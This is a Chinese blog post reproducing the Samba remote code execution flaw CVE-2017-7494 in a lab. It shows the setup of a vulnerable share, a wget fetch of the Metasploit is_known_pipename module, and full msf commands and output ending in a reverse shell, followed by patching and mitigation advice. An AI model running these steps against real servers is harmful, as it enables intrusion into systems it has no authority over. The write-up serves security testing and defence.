From:http://fuping.site/2017/05/25/Samba-Remote-Code-Execution-Vulnerability-Replication/
概述
Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
这里采用ubuntu-16.04.2 x64位为测试机。
复现过程
环境的搭建
靶机中默认未安装Samba,首先来安装Samba并进行配置。
|
安装成功,查看版本
修改Samba配置文件
sudo gedit /etc/samba/smb.conf
在最底部添加如下内容
[fuping] #显示的共享文件夹名字
path = /tmp
public = yes
writeable = yes
然后重启smbd服务
|
至此,环境已经搭建成功。开始用Kail进行攻击。
攻击过程
首先去下载利用的脚本。
root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/linux/samba
root@kali:/usr/share/metasploit-framework/modules/exploits/linux/samba# wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O is_known_pipename.rb
然后就是在Metasploit中加载并使用脚本,攻击过程如下
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
2 Linux x86
msf exploit(is_known_pipename) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Linux ARM (LE)
2 Linux x86
3 Linux x86_64
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > set target 3
target => 3
msf exploit(is_known_pipename) > exploit
[*] Started reverse TCP handler on 192.168.232.134:4444
[*] 192.168.232.137:445 - Using location \192.168.232.137fuping for the path
[*] 192.168.232.137:445 - Payload is stored in //192.168.232.137/fuping/ as gRoUnyzb.so
[*] 192.168.232.137:445 - Trying location /volume1/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume1/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume2/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /volume3/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /shared/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/usb/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /media/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /mnt/media/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/FUPING/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /var/samba/Fuping/gRoUnyzb.so...
[*] 192.168.232.137:445 - Trying location /tmp/gRoUnyzb.so...
[*] Command shell session 1 opened (192.168.232.134:4444 -> 192.168.232.137:41392) at 2017-05-24 12:35:20 -0400
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)
whoami
nobody
ifconfig
docker0 Link encap:Ethernet HWaddr 02:42:23:77:72:91
inet addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0
inet6 addr: fe80::42:23ff:fe77:7291/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:2 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:180 (180.0 B)
ens33 Link encap:Ethernet HWaddr 00:0c:29:77:23:9e
inet addr:192.168.232.137 Bcast:192.168.232.255 Mask:255.255.255.0
inet6 addr: fe80::7651:9ad0:80e5:c9c8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:349052 errors:0 dropped:0 overruns:0 frame:0
TX packets:112974 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:419009840 (419.0 MB) TX bytes:8902292 (8.9 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:23329 errors:0 dropped:0 overruns:0 frame:0
TX packets:23329 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:48010585 (48.0 MB) TX bytes:48010585 (48.0 MB)
需要填写目标地址和选择Target,我的是x64位系统,所以设置了target为3。
效果图
更新
2017.05.26 对需要登陆的Smb进行验证
脚本已经更新,集成在msf中,直接msfupdate即可。
1.修改Ubuntu中的Samba配置文件。
sudo gedit /etc/samba/smb.conf
在[global]中添加:security = user
修改底部的[fuping]
[fuping] #显示的共享文件夹名字
path = /tmp
writeable = yes
2.添加smb用户
sudo useradd smbuser
sudo smbpasswd -a smbuser
3.开始攻击
msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set SMBUSER smbuser
SMBUSER => smbuser
msf exploit(is_known_pipename) > set SMBPASS smbuser
SMBPASS => smbuser
msf exploit(is_known_pipename) > set RHOST 192.168.232.137
RHOST => 192.168.232.137
msf exploit(is_known_pipename) > exploit
解决方案
1.受影响的用户尽快下载最新的Samba版本手动更新。
2.使用二进制分发包(RPM等方式)的用户立即进行yum,apt-get update等安全更新操作
3.不打补丁的缓解策略:用户可以通过在smb.conf的[global]节点下增加“nt pipe support = no”选项,然后重新启动samba服务, 以此达到缓解该漏洞的效果。
参考
[1]https://github.com/rapid7/metasploit-framework/pull/8450
[2]http://bobao.360.cn/learning/detail/3900.html
[3]https://securityonline.info/cve-2017-7494-samba-remote-code-execution-vulnerability/
本文始发于微信公众号(关注安全技术):Samba远程代码执行漏洞(CVE-2017-7494)复现过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论